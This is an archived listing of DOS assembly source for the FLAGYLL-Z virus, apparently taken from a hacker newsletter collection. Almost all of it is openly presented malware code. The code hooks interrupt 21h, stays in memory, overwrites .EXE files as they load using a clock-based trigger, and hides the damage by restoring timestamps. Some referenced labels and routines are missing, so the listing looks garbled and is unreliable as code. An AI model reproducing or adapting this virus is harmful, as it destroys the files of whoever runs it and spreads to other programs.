Hacker Chronicles 2
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Assembly Source File
254 lines
;FLAGYLL-Z virus - edited for Crypt Newsletter 13
;FLAGYLL is a memory resident, overwriting virus which
;infects and destroys .EXE files on load.
;FLAGYLL-Z's infections are modulated by a routine which
;uses the system clock as a random trigger. When .EXEfiles
;are loaded, FLAGYLL-Z will only infect if the current
;time - in seconds - is below 10.
;FLAGYLL-Z preserves the time-date stamps of infected files.
;.EXE's infected by FLAGYLL-Z are destroyed. DOS will either
;refuse to load them or FLAGYLL-Z will become resident
;as they execute. These programs are ruined and can only
;be deleted.Since the FLAGYLL viruses are so destructive of
;files, it is impossible to imagine them posing a threat in
;the wild.
.radix 16
cseg segment
model small
assume cs:cseg, ds:cseg, es:cseg
org 100h
oi21 equ endflagyll
filelength equ endflagyll - begin ; virus length
nameptr equ endflagyll+4
DTA equ endflagyll+8
begin: jmp install_flagyll
; install
mov ax,cs ; reduce memory size
dec ax
mov ds,ax
cmp byte ptr ds:[0000],5a ; check if last memory
jne cancel ; block
mov ax,ds:[0003]
sub ax,100 ; decrease memory
mov ds:0003,ax
mov bx,ax ; copy to claimed block
mov ax,es ; PSP
add ax,bx ; virus start in memory
mov es,ax
mov cx,offset endflagyll - begin ; cx = length of virus
mov ax,ds ; restore ds
inc ax
mov ds,ax
lea si,ds:[begin] ; point to start of virus
lea di,es:0100 ; point to destination
rep movsb ; copy virus in memory
mov ds,cx ; hook interrupt 21h
mov si,0084h ;
mov di,offset oi21
mov dx,offset check_exec
cmp ax,dx ;
je cancel ; exit, if already installed
push es
pop ds
mov ax,2521h ; revector int 21h to virus
int 21h
cancel: ret
check_exec: ; look over loaded files
pushf ; for executables
push es ; push everything onto the
push ds ; stack
push ax
push bx
push dx
cmp ax,04B00h ; is a file being
; executed ?
jne abort ; no, exit
call infect ; then try to infect
abort: ; restore everything
pop dx
pop bx
pop ax
pop ds
pop es
; exit
jmp dword ptr cs:[oi21]
jmp over_id ; it's a vanity thing
note: db '-=[Crypt Newsletter 13]=-'
mov cs:[name_seg],ds ; this routine
mov cs:[name_off],dx ; essentially grabs
; the name of the file
cld ; clear direction flags
mov word ptr cs:[nameptr],dx ; save pointer to the filename
mov word ptr cs:[nameptr+2],ds
mov ah,2Fh ; get old DTA
int 21h
push es
push bx
push cs ; set new DTA
pop ds
mov dx,offset DTA
mov ah,1Ah
int 21h
call searchpoint ; find filename for virus
push di
mov si,offset COM_txt ; is extension 'COM' ?
mov cx,3
rep cmpsb
pop di
jz return ; if so, let it pass by
mov si,offset EXE_txt ; is extension .EXE ?
mov cl,3
rep cmpsb
jnz return
mov ah,2Ch ; DOS get system time.
int 21h ; <--alter values to suit
cmp dh,10 ; is seconds > 10?
jg return ; if so, be quiet
; this slows down the
; infection so computing is
; horribly disrupted when the
do_exe: ; virus is in memory
mov ax,4300h ; clear attributes
mov ds,cs:[name_seg]
mov dx,cs:[name_off]
int 21h
and cl,0feh
mov ax,4301h
int 21h
mov ds,cs:[name_seg] ; open file read/write
mov dx,cs:[name_off]
mov ax,3D02h
int 21h
jc close_file
push cs
pop ds
mov [handle],ax
mov bx,ax
get_date: mov ax,5700h
int 21h
push cs
pop ds
mov [date],dx
mov [time],cx
push cs
pop ds
mov ax,4200h ; move pointer to beginning of file
push cs
pop ds
mov bx,[handle]
xor cx,cx
xor dx,dx
int 21h
mov ah,40 ; write to file
mov cx,filelength ; length of Flagyll in CX
mov dx,100 ; start at beginning of Flagyll
int 21h ; write Flagyll to file
call restore_date
close_file: mov bx,[handle]
mov ah,03Eh ; close file
int 21h
mov ax,4C00h ; exit to DOS
int 21h
return: mov ah,1Ah
pop dx ; restore old DTA
pop ds
int 21H
searchpoint: les di,dword ptr cs:[nameptr]
mov ch,0FFh
mov al,0
repnz scasb
sub di,4
push cs
pop ds
mov bx,[handle]
mov dx,[date]
mov cx,[time]
mov ax,5701h
int 21h
EXE_txt db 'EXE',0 ; extension masks
COM_txt db 'COM',0 ; for host selection
name_seg dw ? ; data buffers for virus action
name_off dw ? ; on the fly
handle dw ?
time dw ?
date dw ?
note2: db 'Flagyll-Z' ; virus name
cseg ends
end begin